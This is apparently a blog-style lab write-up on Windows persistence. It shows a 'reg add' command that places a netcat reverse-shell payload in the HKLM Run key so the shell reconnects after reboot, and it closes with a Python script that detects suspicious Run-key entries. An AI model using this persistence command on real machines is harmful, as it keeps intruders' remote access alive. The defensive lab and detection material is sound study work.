germasterling.blogg.se

Netcat windows reverse shell

#Netcat windows reverse shell how to

This was originally from the previous lab, but it got too lengthy and I thought this deserved a post of its own. In that lab, exploiting the first computer and moving laterally to exploit another system on the same LAN took up a lot of time.

To maintain access (persistence), one could add the reverse shell payload to the startup (Run) key of the Registry. That way, when the system restarts, the connection will be broken briefly and then re-established to our listening Kali. Remember that to do all this we need SYSTEM or local admin rights. Note that we do not need PowerShell for this. As usual, I'm avoiding the use of Meterpreter's Persistence script and just using cmd.

The registry is a little different for Windows XP. The command to add a Registry key to run on restart would be:

    C:\Lab27> reg add HKLM\software\microsoft\windows\currentversion\run /v netcat /t REG_SZ /f /d "\"C:\Lab27\200_shell.exe\""

    C:\Lab27>reg query HKLM\software\microsoft\windows\currentversion\run

    HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\run
        VMware Tools    REG_SZ    "C:\Program Files\VMware\VMware Tools\VMwareTray.exe"
        VMware User Process    REG_SZ    "C:\Program Files\VMware\VMware Tools\vmtoolsd.exe" -n vmusr
        UserFaultCheck    REG_EXPAND_SZ    %systemroot%\system32\dumprep 0 -u

Here, C:\Lab27\200_shell.exe is our reverse shell payload. If you need to see how to use reg add or reg query, you can run reg add /? or reg query /? for the syntax.
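From the defender's side, the same reg query output is what gives this persistence away. The Python below is an added example, not part of the original post: it parses a Run key listing and flags values whose executable lies outside an assumed allow-list of install directories. The sample listing is constructed from the entries shown above plus the netcat value that reg add creates; TRUSTED_DIRS and the environment-variable defaults are assumptions.

```python
import ntpath
import re

# Assumed allow-list of install locations and assumed env defaults; tune per estate.
TRUSTED_DIRS = (r"c:\windows", r"c:\program files", r"c:\program files (x86)")
ENV = {"%systemroot%": r"c:\windows", "%programfiles%": r"c:\program files"}
VALUE_RE = re.compile(r"^\s+(?P<name>.+?)\s+(?P<type>REG_(?:EXPAND_)?SZ)\s+(?P<data>.+?)\s*$")


def parse_reg_query(text):
    """Return (name, type, data) for each string value in `reg query` output."""
    return [m.group("name", "type", "data")
            for m in map(VALUE_RE.match, text.splitlines()) if m]


def command_path(data):
    """Extract the executable path from a Run value, lower-cased and normalised."""
    data = data.strip().lower()
    for var, val in ENV.items():
        data = data.replace(var, val)
    if data.startswith('"'):
        path = data[1:].split('"', 1)[0]   # quoted path may contain spaces
    else:
        path = data.split(" ", 1)[0]       # unquoted: first token only
    return ntpath.normpath(path)           # collapses "..\" tricks


def suspicious_autoruns(text):
    """Flag Run values whose executable is outside TRUSTED_DIRS."""
    hits = []
    for name, _type, data in parse_reg_query(text):
        path = command_path(data)
        if not any(path.startswith(d + "\\") for d in TRUSTED_DIRS):
            hits.append((name, path))
    return hits


# Constructed sample: the listing from this post plus the value added by `reg add`.
SAMPLE = r'''
HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\run
    VMware Tools    REG_SZ    "C:\Program Files\VMware\VMware Tools\VMwareTray.exe"
    VMware User Process    REG_SZ    "C:\Program Files\VMware\VMware Tools\vmtoolsd.exe" -n vmusr
    UserFaultCheck    REG_EXPAND_SZ    %systemroot%\system32\dumprep 0 -u
    netcat    REG_SZ    "C:\Lab27\200_shell.exe"
'''

if __name__ == "__main__":
    for name, path in suspicious_autoruns(SAMPLE):
        print(f"review autorun {name!r}: {path}")
```

An unquoted path containing spaces is cut at the first space and therefore flagged, which is intentional: such values deserve a manual look anyway.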













